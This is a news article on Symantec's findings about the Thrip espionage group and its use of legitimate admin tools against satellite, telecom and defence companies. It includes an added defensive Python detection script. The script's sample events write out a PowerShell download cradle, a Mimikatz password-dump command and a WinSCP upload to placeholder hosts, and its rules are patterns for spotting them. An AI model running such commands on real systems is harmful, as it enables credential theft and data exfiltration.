A Chinese cyber-hacking group is thought to have hacked a number of companies in the satellite, telecom and defence industries in the US and Southeast Asia, it has emerged.


According to security researchers at Symantec, the campaign originated from machines based in mainland China.


Dubbed Thrip by the researchers, the group has been operating since 2013, relying on built-in operating system features and legitimate network administration tools to compromise victims’ networks, an approach known as “living off the land”.


“The purpose of living off the land is twofold. By using such features and tools, attackers are hoping to blend in on the victim’s network and hide their activity in a sea of legitimate processes. Secondly, even if malicious activity involving these tools is detected, it can make it harder to attribute attacks,” said researchers in a blog post. 


There are four key targets of Thrip. First, a satellite communications operator, suggesting that motives go beyond spying and may also include disruption. Second, the hackers are going after geospatial imaging and mapping, mainly on the operational side of the company, targeting computers running MapXtreme GIS (Geographic Information System) software, which is used to integrate location-based data into other applications. They also targeted machines running Google Earth Server and Garmin imaging software.


The hackers have also targeted three different telecoms operators, all based in Southeast Asia – in all cases, based on the nature of the computers infected by Thrip, it appeared that the telecoms companies themselves and not their customers were the targets of these attacks. A fourth target of interest was a defence contractor.


Researchers said the hackers used legitimate tools such as PsExec, a Microsoft Sysinternals tool for executing processes on other systems, which the attackers used primarily to move laterally across the victim’s network.


Hackers also used PowerShell to run commands to download payloads, traverse compromised networks, and carry out reconnaissance. They also made use of Mimikatz, a freely available tool capable of changing privileges, exporting security certificates, and recovering Windows passwords in plaintext; WinSCP, an open source FTP client used to exfiltrate data from targeted organisations; and LogMeIn. With the last tool, Symantec said it was unclear whether the attackers gained unauthorised access to victims’ LogMeIn accounts or whether they created their own.


These legitimate tools were used to install custom malware, such as Trojan.Rikamanu, Infostealer.Catchamas, Trojan.Mycicil, Backdoor.Spedear, and Trojan.Syndicasec.
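Because every tool named above is legitimate on its own, a defender’s detection has to correlate their combined use per host rather than alert on any single one. The following is an added example written for this article, not Symantec’s TAA or any code from the report: it runs simple command-line rules over constructed process-creation records (hypothetical hostnames, placeholder domains) and flags only hosts where several living-off-the-land tools appear together.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records (hypothetical hosts and paths),
# in the shape a Sysmon or EDR export might take: host, parent image, image, command line.
SAMPLE_EVENTS = [
    {"host": "gis-ws01", "parent": "explorer.exe", "image": "psexec.exe",
     "cmdline": r"psexec.exe \\gis-srv02 -s cmd.exe"},
    {"host": "gis-ws01", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/p')\""},
    {"host": "gis-ws01", "parent": "cmd.exe", "image": "mimikatz.exe",
     "cmdline": "mimikatz.exe privilege::debug sekurlsa::logonpasswords"},
    {"host": "gis-ws01", "parent": "cmd.exe", "image": "winscp.exe",
     "cmdline": "winscp.exe /command \"open sftp://placeholder.invalid\" \"put C:\\exports\\*.zip\""},
    # Routine, isolated admin use of PsExec on another host: should not be flagged by itself.
    {"host": "admin-ws07", "parent": "explorer.exe", "image": "psexec.exe",
     "cmdline": r"psexec.exe \\file-srv01 ipconfig /all"},
]

# One rule per tool named in the Thrip write-up: (rule name, command-line pattern, weight).
# Weights reflect how rarely the behaviour is benign, not how "dangerous" the tool is.
RULES = [
    ("psexec_remote_exec", re.compile(r"psexec(?:64)?\.exe\s+\\\\\S+", re.I), 2),
    ("powershell_download_cradle",
     re.compile(r"net\.webclient|downloadstring|downloadfile|\biex\b|invoke-expression", re.I), 3),
    ("mimikatz_credential_dump", re.compile(r"mimikatz|sekurlsa::|lsadump::", re.I), 5),
    ("winscp_scripted_upload", re.compile(r"winscp\.(?:exe|com)\s+/command.*\bput\b", re.I), 3),
]


def score_hosts(events, threshold=6):
    """Tally rule hits per host and return {host: (score, [rule names])} for hosts
    whose combined living-off-the-land score reaches the threshold."""
    hits = defaultdict(list)
    score = defaultdict(int)
    for ev in events:
        text = f"{ev['image']} {ev['cmdline']}"
        for name, pattern, weight in RULES:
            if pattern.search(text):
                hits[ev["host"]].append(name)
                score[ev["host"]] += weight
    return {h: (score[h], hits[h]) for h in score if score[h] >= threshold}


if __name__ == "__main__":
    for host, (total, names) in score_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: score={total} rules={names}")
```

The single PsExec invocation on admin-ws07 stays below the threshold, while gis-ws01 is flagged because lateral movement, a download cradle, credential dumping and a scripted upload all appear on one host.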


Symantec said it detected the attacks using its Targeted Attack Analytics (TAA) tool, which uses artificial intelligence and machine learning to spot patterns associated with targeted attacks. The tool flagged unusual activity in January this year.


“This is likely espionage,” said Greg Clark, Symantec CEO. “The Thrip group has been working since 2013 and their latest campaign uses standard operating system tools, so targeted organisations won’t notice their presence. They operate very quietly, blending into networks, and are only discovered using artificial intelligence that can identify and flag their movements. Alarmingly, the group seems keenly interested in telecom, satellite operators, and defence companies.”

This article originally appeared at scmagazineuk.com